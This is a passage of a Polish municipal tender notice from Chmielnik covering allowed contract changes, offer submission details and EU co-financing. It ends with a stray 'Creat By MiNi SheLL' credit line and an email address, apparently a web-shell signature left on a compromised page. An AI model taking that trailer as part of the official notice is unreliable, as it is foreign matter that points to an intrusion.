<p>1. Dopuszcza się możliwość zmiany terminu wykonania zamówienia w następujących przypadkach:
-wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego lub osób trzecich ( w tym również trudnej sytuacji finansowej Zamawiającego spowodowanej mniejszymi niż planowane dochodami budżetowymi);
-działania siły wyższej, za które uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a których strony nie były w stanie przewidzieć 
w momencie zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu zamówienia zgodnie z treścią umowy. Strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego pisemnego powiadomienia drugiej strony, 
a następnie udokumentowania zaistnienia tego stanu.
-konieczności wykonania robót dodatkowych na skutek sytuacji niemożliwej wcześniej do przewidzenia,
-opóźnień w realizacji zamówienia będących następstwem wad zawartych w dostarczonej przez zamawiającego dokumentacji projektowej lub w specyfikacji technicznej wykonania i odbioru robót.
-dopuszcza się możliwość zmiany wynagrodzenia umownego w okolicznościach: urzędowej zmiany stawki podatku VAT,
- jeżeli  zmiany dokumentacji będą zapobiegać powstaniu wady obiektu budowlanego, będą usprawniać bezpieczeństwo, usprawniać proces budowlany, wprowadzać nowe rozwiązania technologiczne i zmiany te będą korzystne dla Zamawiającego. 
W takiej sytuacji wartość robót, które nie zostaną wykonane na skutek zmiany dokumentacji a ujęte były w kosztorysie ofertowym, zostanie przez Zamawiającego potrącona z ceny ustalonej w umowie. 
Zakres robót zamiennych zostanie określony zmienioną dokumentacją projektową lub protokołem konieczności a wartość robót zamiennych zostanie ustalona w drodze negocjacji stron, przy uwzględnieniu składników cenotwórczych jakie Wykonawca zastosował 
w kosztorysie ofertowym.
- zmiany nazwy firmy lub adresu, zmiany kierownika budowy, nr konta, formy organizacyjno-prawnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chmielnik.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Chmielniku,  
Pl. Kościuszki 7, 26-020 Chmielnik
Wydział Budownictwa -pokój nr 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2015 godzina 10:00, miejsce: Urząd Miasta i Gminy w Chmielniku,  
Pl. Kościuszki 7, 26-020 Chmielnik
pokój nr 102 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007 - 2013, Oś 6, Działanie 6.2 -  Rewitalizacja małych miast.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com